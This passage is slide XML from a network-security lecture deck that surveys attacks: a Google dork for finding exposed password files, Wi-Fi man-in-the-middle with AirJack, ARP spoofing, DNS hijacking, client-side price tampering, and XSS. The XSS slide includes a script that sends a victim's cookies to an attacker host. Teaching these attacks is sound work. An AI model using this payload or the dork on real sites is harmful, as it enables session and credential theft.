              <a:t>lack of authentication: using "hidden" web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>links; broadcast video from security cameras</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>using irreversible hash functions without salt for password conversion (rainbow tables)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="22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73C85702-810A-43F7-AE4D-0A05D516C5F6}"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Attack with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="441144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3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Search: username password filetype:xlsx</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Among the first few links, you can find, for example, a set of passwords for accessing full-text databases of articles</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7F25CFB6-3619-4AD0-9F01-42BF296ABB9B}"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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="285840" y="1719360"/>
            <a:ext cx="8400600" cy="478116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Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="30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"The Tale of Tsar Saltan" by A.S.Pushkin</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="26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Driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>AirJack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WiFi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>makes the network card an access point that users automatically connect to. Their requests are redirected to the actual access point. Responses pass through the hacker's computer. This way, for example, you can easily replace the video that is being broadcast by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WiFi-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>security camera</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="26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3F75A9A8-6082-4407-815D-7EFDF9AEE9D1}"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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1357200"/>
            <a:ext cx="8229240" cy="4773240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>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1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ARP-spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pP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C17189ED-E10D-48C9-BB29-CFEBD0954480}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1298520" y="1785960"/>
            <a:ext cx="6416280" cy="490176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900" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>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arn-CL" sz="3000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DNS hijacking</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9876A9ED-B775-4B6A-9B20-B2FE01AF3CF4}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="" hidden="0"/>
          <p:cNvPicPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971640" y="2421000"/>
            <a:ext cx="6933960" cy="4285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Programmer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3900" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Negligence</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="39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92E7B18E-9BF0-4930-BC06-D65C4A4B590A}" type="slidenum">
              <a:rPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:fld>
            <a:endParaRPr lang="ru-RU" sz="1000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CustomShape 3" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="438440" indent="-438080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="799"/>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200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="32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possibility to change the cost of purchased goods in the online store </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="984240" lvl="2" indent="-290160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CCCC00"/>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300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>When adding an item to the shopping cart, its price is specified in the parameters of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="984240" lvl="2" indent="-290160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CCCC00"/>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300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>When adding an item to the shopping cart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>the function sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> with the specified price</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="984240" lvl="2" indent="-290160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CCCC00"/>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300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Correct solution: should only be specified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>products id, the price must be always taken from the database on the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>regardless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> it is slower</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2300" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="985680" indent="-290160">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="23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Outline</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3900" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8229240" cy="4411440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="114999"/>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The concept of the network security</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="114999"/>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Main components</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="114999"/>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Network threats (hacking methods)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3000" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="416411" indent="-416051">
              <a:lnSpc>
                <a:spcPct val="114999"/>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Defence</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87A5ADFF-B92D-4442-A379-A7B7DFD45C87}"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200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="285840" y="1428840"/>
            <a:ext cx="8400600" cy="5428800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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15 % of all detected vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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68% of sites are affected by this attack</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="394383" indent="-394023">
              <a:lnSpc>
                <a:spcPct val="10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active (triggered automatically when the page loads):</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>post messages on forums or in comments with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>new Image().src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“http://spy.ru/saveCoockie.cgi?c=“ +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>encodeURI(document.cookie);</a:t>
            </a:r>
            <a:br>
              <a:rPr/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;IMG SRC=`javascript:…`&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="689040" lvl="1" indent="-347400">
              <a:lnSpc>
                <a:spcPct val="10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2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>; …</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="24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E2E46874-DB46-405C-8535-D732301C8EA1}"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200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CustomShape 2" hidden="0"/>
          <p:cNvSpPr/>
          <p:nvPr isPhoto="0" userDrawn="0"/>
